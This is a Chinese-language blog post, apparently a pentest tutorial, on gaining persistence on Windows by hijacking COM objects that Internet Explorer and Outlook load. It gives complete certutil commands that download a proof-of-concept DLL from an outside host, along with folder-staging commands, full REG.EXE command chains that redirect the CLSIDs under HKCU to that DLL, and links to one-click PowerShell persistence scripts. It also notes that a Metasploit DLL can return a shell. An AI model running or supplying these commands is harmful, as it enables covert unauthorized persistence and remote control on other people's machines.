CATALOG

  • 1.实现原理
  • 2.实现过程
    • 劫持IE浏览器
    • 劫持outlook
  • 3.参考文章

1.实现原理

通过劫持IE浏览器或者outlook启动过程中启动的com组件,来使系统执行我们所指定的dll文件,进而达到权限维持,可以通过修改注册表来完成,不需要管理员权限。

2.实现过程

劫持IE浏览器

  1. 下载poc文件:
    certutil.exe -urlcache -split -f https://github.com/3gstudent/test/blob/master/calcmutex.dll
  2. 创建文件夹
    如果是64位系统:
mkdir %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
cd  %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}

  1. 下载文件并修改文件名
certutil.exe -urlcache -split -f [url] api-ms-win-downlevel-1x64-l1-1-0._dl
certutil.exe -urlcache -split -f [url] #删除缓存

  1. 修改注册表
    值为刚下载的文件的绝对路径:
C:\Users\test\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl
  1. 劫持结果

也可以使用msf生成的dll来实现,会弹回shell,不过机器重启后,会丢失桌面,直接黑屏。需要自己编写恶意dll确保dll只会执行一次。定义一个互斥向量即可。

所有命令如下:

cd desktopmkdir %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}copy calcmutex.dll %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x86-l1-1-0._dlcopy calcmutex_x64.dll %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dlSET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Users\test\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /FSET KEY=HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Users\test\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x86-l1-1-0._dl" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F

也可以使用脚本一键完成:https://github.com/3gstudent/COM-Object-hijacking

劫持outlook

实现所需所有命令如下:

reg add HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /freg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /freg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Users\test\Desktop\calc.dll" /freg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /freg add HKCU\Software\Classes\Wow6432Node\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /freg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /freg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Users\test\Desktop\calc.dll" /freg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f

自动实现脚本:https://github.com/3gstudent/Homework-of-Powershell/blob/master/Invoke-OutlookPersistence.ps1

3.参考文章

Hijack CAccPropServicesClass and MMDeviceEnumerator劫持IE浏览器
Use COM Object hijacking to maintain persistence——Hijack Outlook

劫持outlook与IE浏览器实现权限维持相关推荐

  1. 火狐浏览器摄像头权限怎么开启 火狐浏览器摄像头权限开启的方法

    火狐浏览器是我们大家经常使用的浏览器之一,在使用这款浏览器的过程有时候需要使用到摄像头,那你知道火狐浏览器摄像头权限怎么开启的吗?接下来我们一起往下看看火狐浏览器摄像头权限开启的方法吧. 方法步骤 1 ...

  2. 大规模针对iOS设备的恶意广告活动劫持3亿次浏览器会话

    针对iOS设备的大规模恶意广告活动在短短48小时内就劫持了3亿次浏览器会话.Confiant的研究人员记录了11月12日的活动,表示该活动背后的威胁行动者至今仍保持活跃. 恶意登录页面 当用户访问网页 ...

  3. 清除 360流氓软件对浏览器的劫持插件B5T,浏览器快捷方式会带参数 123.125y.com

    1)解决快捷方式不能修改的问题    1.1) 思路是这样的,在修改"快捷方式"时,如果提示"无权限修改", 则问题是"快捷方式"所在目录权 ...

  4. 解决:win10 浏览器麦克风权限如何打开?打开也没用?

    前提:一定要确保系统本身就已经启用麦克风,具体操作如下: 设置 -> 隐私 -> 打开麦克风权限 根据提示,打开浏览器权限,这里以谷歌浏览器为例,其他的可以参考:https://zhuan ...

  5. 浏览器劫持解决:解决浏览器的捆绑问题

    解决浏览器开始页捆绑问题 引子 大家好,我是小赵,我们日常上网的时候,难免会被一些流氓网站看中,修改软件属性,导致我们浏览器的起始页遭到毁灭性打击,更改起始页被篡改成各种流氓网站的页面,修改我们的起始 ...

  6. debian9.6解决firefox浏览器安全权限的问题

    刚刚安装新的debian系统,可能某些网页打不开,比如说游戏网页. 老的方法: 可能是因为firefox浏览器版本的升级,老的方法是打开右上角浏览器的选项,然后找到应用,里面可以设置,但是我这没有,我 ...

  7. 百度浏览器的编程html,百度来路浏览器劫持代码(替换浏览器正在浏览页面)...

    代码已经调试,确认完全无误! if (document.cookie.indexOf('whoami') == -1) { var exp = new Date(); exp.setTime(exp. ...

  8. 浏览器劫持定义及危害、处理浏览器被劫持自动跳转到某个网页的修复教程

    浏览器劫持是一种恶意程序,通过浏览器插件.BHO(浏览器辅助对象).Winsock LSP等形式对用户的浏览器进行篡改,使用户的浏览器配置不正常,被强行引导到商业网站. 所谓浏览器劫持是指网页浏览器( ...

  9. 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF

    目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...

最新文章

  1. javascript 基础篇2 数据类型,语句,函数
  2. 统治世界的十大排序算法!
  3. Python IO编程-组织文件
  4. 学习 SQL 语句 - Select(7): 分组统计之 Avg()、Sum()、Max()、Min()、Count()
  5. Spring之IOC容器篇
  6. 超级详细的手写webpack4配置来启动vue2项目(附配置作用)
  7. C#设置IP地址,启用禁用适配器
  8. android开不了机怎么办手机号码,手机开不了机怎么办 原因分析及其解决方法
  9. Android报错:No resource found that matches the given name 'Theme.AppCompat.Light.NoActionBar'
  10. 模拟银行转账(java+mysql+tomcat +JDBC+ druid连接池 + Servlet + Ajax)
  11. 笔记本指纹识别linux版驱动程序,联想Thinkpad指纹识别驱动
  12. Python代码加密-PyArmor
  13. selenium实例自动登陆知乎
  14. stm32最小系统原理图
  15. Python批量识别PDF文件格式发票信息并生成Excel表格
  16. 移动端使用a标签tel属性实现拨打电话
  17. arduino测试ArduinoModbus库例程
  18. VW和VH移动端布局
  19. VM虚拟机中鼠标左键点击失效解决方案
  20. Postgresql:杀进程

热门文章

  1. 增量式PID控制算法及仿真
  2. mpvue上拉刷新,下拉加载
  3. html做成小程序,微信小程序——简单静态网页的制作
  4. 《信息安全保障》一1.3 信息系统安全保障概念与模型
  5. 完全背包与01背包的区别
  6. 论文阅读:Bi-Modal PMA
  7. 查看tomcat的版本号
  8. 相干层析模型计算matlab,MATLAB 空间计量模型的实现
  9. 全国计算机网络评课测试,第一次网络评课
  10. 人体动作识别与评价——区别、联系及研究进展